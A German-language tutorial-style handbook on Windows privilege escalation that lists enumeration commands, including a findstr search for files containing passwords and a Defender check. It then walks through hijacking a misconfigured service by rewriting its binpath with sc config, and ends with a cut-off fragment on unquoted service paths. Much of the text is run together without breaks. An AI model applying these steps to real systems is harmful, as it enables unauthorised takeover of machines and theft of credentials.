
Mein Handbuch zu Konzepten der Windows-Privilegienausweitung. Schau dir unbedingt meine Playlist an, Link: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
Ein wichtiger Punkt, den man beachten sollte, sind Gruppen: Jeder Benutzer der Gruppe Administratoren hilft uns bei der Eskalation!
whoami /priv - Rechte des aktuellen Benutzersnet users - listet alle Benutzer aufnet user <username> - listet Details eines bestimmten Benutzers aufqwinsta - Andere Benutzer, die gleichzeitig angemeldet sindnet localgroup - Im System verfügbare Gruppennet localgroup <group-name> - listet Mitglieder einer bestimmten Gruppe aufsysteminfo - liefert alle Informationen über das Betriebssystemhostname - Hostname des Systemsfindstr /si password *.txt - wir suchen nach Dateien, die "password" enthalten, und zwar in Textdateienwmic qfe get Caption,Description,HotFixID,InstalledOn - zeigt Informationen zu Sicherheitspatches und damit zusammenhängende Informationennetstat -ano - mit dem Rechner verbundene Verbindungenschtasks /query /fo LIST /v - nach geplanten Aufgaben suchendriverquery - listet treiberbezogene Informationen aufsc query windefend - sucht nach Antivirendienstsysteminfo-Tools auf deinem Rechner – das ist die einzige Voraussetzung für dieses Toolwmic product get name,version,vendor - liefert Produktname, Version und Hersteller. Dieser spezielle Befehl liefert eine ordentliche Darstellung dessen, was wir brauchen.wmic service list brief | findstr "Running" und um weitere Informationen über den Dienst zu erhalten, verwende sc qc <ServiceName>post/multi/recon/local_exploit_suggester aus. Stelle sicher, dass deine Session im Hintergrund läuft, damit dieses Tool ordnungsgemäß funktioniert, oder du kannst es einfach aus Meterpreter laden.winpeas.exe --help ausführst.systeminfo ausführst, und kopierst diese in eine beliebige Datei und benennst sie mit der Endung .txtHier versuchen wir, Dienste mit unsicheren Berechtigungen zu identifizieren und diese dann auszunutzen.
Hier können wir den Befehl winpeas.exe servicesinfo verwenden und sehen uns die Dienste an, die ziemlich hilfreich sind
Ein interessanter Teil der Ausgabe sieht so aus,```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- Aber um weitere Informationen zu erhalten, können wir ein von Microsoft stammendes Tool namens **accesschk** verwenden. Führen Sie es wie folgt aus: `accesschk.exe /accepteula -uwcqv <current-user> <service>`. Die Ausgabe ist:```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config, womit wir die Konfiguration des Dienstes ändern können.sc qc <service> aus und notieren Sie dann den Binary_path_name (dieser kann auch als binpath bezeichnet werden), den wir ändern werden (böses Lächeln).sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" aus und starten Sie dann den Dienst sc start daclsvc.Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.